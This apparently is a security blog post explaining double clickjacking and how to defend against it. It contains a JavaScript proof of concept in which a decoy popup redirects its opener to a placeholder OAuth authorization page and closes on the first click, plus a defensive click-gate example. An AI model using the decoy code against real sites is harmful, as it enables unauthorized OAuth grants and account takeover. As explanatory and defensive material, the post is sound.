
Introduction
You may have heard about clickjacking before, but what about DOUBLE clickjacking?
The same threat has evolved into a newer form that sidesteps the defences built for the original.
In a regular clickjacking attack, you are tricked into clicking on a hidden or disguised element, such as a button or link, which performs an action you did not intend. Typically the attacker loads the legitimate site in a transparent iframe layered over a decoy page, so the click you think you are making on the harmless decoy actually lands on the trusted site's button underneath it.
In a double clickjacking attack, the attacker tricks you into double-clicking on a seemingly harmless prompt shown in a small new window. The first click (more precisely, its mousedown event) closes or changes that top window, and the second click lands on a sensitive element in the window behind it. Because no iframe is involved, the usual anti-framing defences never come into play. Awareness is the first line of defence against threats like this.
How Double Clickjacking Works
This technique is particularly dangerous because it bypasses traditional clickjacking protections: X-Frame-Options, CSP frame-ancestors and SameSite cookies are all irrelevant when the target is loaded as a top-level window rather than in a frame. It can lead to account takeovers, unauthorized application permissions such as OAuth grants, and other breaches. Here is how it works.
- Initial Setup: The attacker builds a website with a button that, when clicked, opens a new window displaying an innocent-looking prompt.
- Triggering the Exploit: The new window instructs the user to double-click somewhere on it. While the user's attention is on that prompt, the attacker's script silently navigates the original (opener) window to the sensitive target page, for example an OAuth authorization prompt or a form that asks for personal information, so that its sensitive button ends up directly under the cursor.
- Executing the Attack: On the first click, the top window closes (or is changed), and the second click of the double-click lands on the sensitive element in the parent window, authorizing the malicious action without the user realizing it.
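The three steps above, as an added illustration that is not code from the original post. The decoy page's script navigates the window that opened it to the target as soon as it loads, then closes itself on the first mousedown of the double-click. TARGET_URL, DECOY_URL and the button id are hypothetical placeholders, and the window objects are passed in as parameters so the same logic can be exercised with fake windows outside a browser.

```javascript
// Added illustration of the double-clickjacking flow (not from the original post).
// Both URLs are hypothetical placeholders; no real endpoint is implied.
const TARGET_URL = "https://target.example/oauth/authorize?client_id=attacker-app";
const DECOY_URL = "/decoy.html";

// Runs inside the decoy window (the attacker's popup page); `self` is that window.
// It navigates the opener to the sensitive page at once, so the target loads
// while the user reads the prompt, then closes itself on the first mousedown so
// the second click of the double-click lands on the opener.
function runDecoy(self) {
  const state = { closedOnMousedown: false };
  if (!self.opener) return state;          // not opened by a script: nothing to hijack
  self.opener.location.href = TARGET_URL;  // top-level navigation: no iframe, so
                                           // X-Frame-Options / frame-ancestors never apply
  // mousedown is dispatched before click, so acting here guarantees the decoy is
  // gone before the browser dispatches the second click.
  self.addEventListener("mousedown", () => {
    if (state.closedOnMousedown) return;   // only the first click matters
    state.closedOnMousedown = true;
    self.close();
  });
  return state;
}

// Attacker landing page: opens the decoy in response to a user click, which is
// what popup blockers allow. `win` is the landing page's window.
function openDecoy(win) {
  return win.open(DECOY_URL, "decoy", "width=420,height=260");
}

// Browser wiring, skipped outside a DOM. The same script serves both pages:
// on the decoy page window.opener is set, on the landing page it is not.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  if (window.opener) {
    runDecoy(window);
  } else {
    const start = document.getElementById("start"); // hypothetical <button id="start">
    if (start) start.addEventListener("click", () => openDecoy(window));
  }
}
```

Note what is absent from this flow: no iframe, no overlay and no cross-site request. The opener is simply navigated as a top-level window, so every defence that reasons about framing or cross-site cookies has nothing to inspect.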
OAuth tokens grant an application access to a user's data without the user ever sharing their password. Access tokens authorize API requests and are usually short-lived; refresh tokens keep sessions alive by obtaining new access tokens when the old ones expire. An attacker who tricks a user into approving a malicious app, or who steals an existing token, gets that access without touching the password at all.
Real-Life Incidents
Consider an incident at Slack involving OAuth tokens; it shows what an attacker gains once a token is in hand, whichever way it was obtained. Threat actors gained access to the company's GitHub repositories using stolen employee tokens and downloaded private code repositories, although Slack reported no evidence that customer data was compromised.
Attackers have also targeted Salesforce accounts for the sensitive data they hold. One notable actor is the hacking group '0ktapus', which phished its way into technology and gaming companies; misconfigured Salesforce communities, meanwhile, have exposed sensitive data and even allowed user accounts to be taken over.
Protect API keys and OAuth tokens as rigorously as passwords; they grant the same access without any login prompt.
Case studies like these show why robust security measures such as multi-factor authentication and automated monitoring of user activity matter. Note, though, that MFA does not stop a double clickjacking attack by itself: the victim is already authenticated when the second click lands, so the authorization goes through on their existing session.
How Can You Stay Safe?
By staying informed and cautious, you can protect yourself from these attacks, and as a developer you can protect your users.
- Use Security Headers: Implement X-Frame-Options and the Content Security Policy (CSP) frame-ancestors directive so your site cannot be embedded in iframes on other sites. This blocks classic clickjacking, but not double clickjacking, which loads your site as a top-level window rather than in a frame.
- Enable Clickjacking Protection in Web Applications: If you are a developer, ensure that your web applications have built-in clickjacking protection; many modern web frameworks set these headers for you. For double clickjacking, the effective client-side check is to keep sensitive buttons (Authorize, Confirm, Pay) disabled until the page has seen a deliberate mouse movement or key press.
- Smart Browser Extensions: Use browsers and extensions with additional security features, such as blocking malicious scripts and frames, and keep your browser and all plugins up to date. Browser developers continually improve their defences against new threats.
- Use Multi-Factor Authentication (MFA): Enable MFA on your accounts whenever possible. It adds an extra layer of security that makes stolen passwords far less useful to attackers, even though it does not by itself block a hijacked click made on a session you have already authenticated.
- Be Wary of Unusual Requests: Be cautious when a website asks you to double-click on something, especially a small pop-up window that appears out of nowhere. This can be a sign of a double clickjacking attempt.
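A client-side gate for a sensitive button, added here as an example that is not code from the original post. It implements the second bullet above: the button starts disabled, a click is honoured only after the page has seen a genuine pointer movement or key press since it became visible, and only once a short settling time has passed. The button id and both thresholds are assumptions chosen for illustration.

```javascript
// Added example (not from the original post): a click gate for a sensitive
// control, the defence that actually addresses double clickjacking. A decoy
// double-click produces no pointer movement on the target page between its two
// clicks, so requiring a gesture leaves the hijacked second click locked out.
// MIN_MS_SINCE_VISIBLE is an assumed value, not a standard.
const MIN_MS_SINCE_VISIBLE = 500;

// `now` is injectable so the gate can be exercised with a fake clock.
function createClickGate(now = () => Date.now()) {
  const state = { visibleAt: now(), gestureSeen: false };
  return {
    // Call when the page becomes visible or is navigated into: a page the
    // attacker just redirected the opener to starts from a clean slate.
    markVisible() {
      state.visibleAt = now();
      state.gestureSeen = false;
    },
    // Call on mousemove / keydown / touchmove, i.e. on evidence of a real user
    // interacting with THIS page rather than with a decoy window above it.
    markGesture() {
      state.gestureSeen = true;
    },
    // Decide whether a click on the sensitive control should be honoured.
    check() {
      if (!state.gestureSeen) return { allowed: false, reason: "no-gesture" };
      if (now() - state.visibleAt < MIN_MS_SINCE_VISIBLE) return { allowed: false, reason: "too-soon" };
      return { allowed: true, reason: "ok" };
    },
  };
}

// Browser wiring for a hypothetical <button id="authorize">; skipped outside a DOM.
// The button is enabled only by a real gesture, and the click handler re-checks
// the gate so a click that slips through (e.g. a focused button activated by
// keyboard before the settling time) is still dropped.
if (typeof document !== "undefined") {
  const gate = createClickGate();
  const button = document.getElementById("authorize");
  if (button) {
    button.disabled = true;
    for (const type of ["mousemove", "keydown", "touchmove"]) {
      document.addEventListener(type, () => {
        gate.markGesture();
        button.disabled = false;
      });
    }
    document.addEventListener("visibilitychange", () => {
      if (document.visibilityState === "visible") {
        gate.markVisible();
        button.disabled = true;
      }
    });
    button.addEventListener("click", (event) => {
      const verdict = gate.check();
      if (!verdict.allowed) {
        event.preventDefault();
        event.stopImmediatePropagation();
        console.warn("sensitive click rejected:", verdict.reason);
      }
    });
  }
}
```

Two caveats. `event.isTrusted` is no help here, because the hijacked second click is a genuine user click, which is why the gate keys on a gesture rather than on event provenance. And the server never sees the gesture, so this is a client-side control to run alongside the framing headers, not a replacement for them or for checking that a consent request was shown and understood.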
Stay informed and stay safe online!
Originally published as "Double Clickjacking, Toil and Trouble!".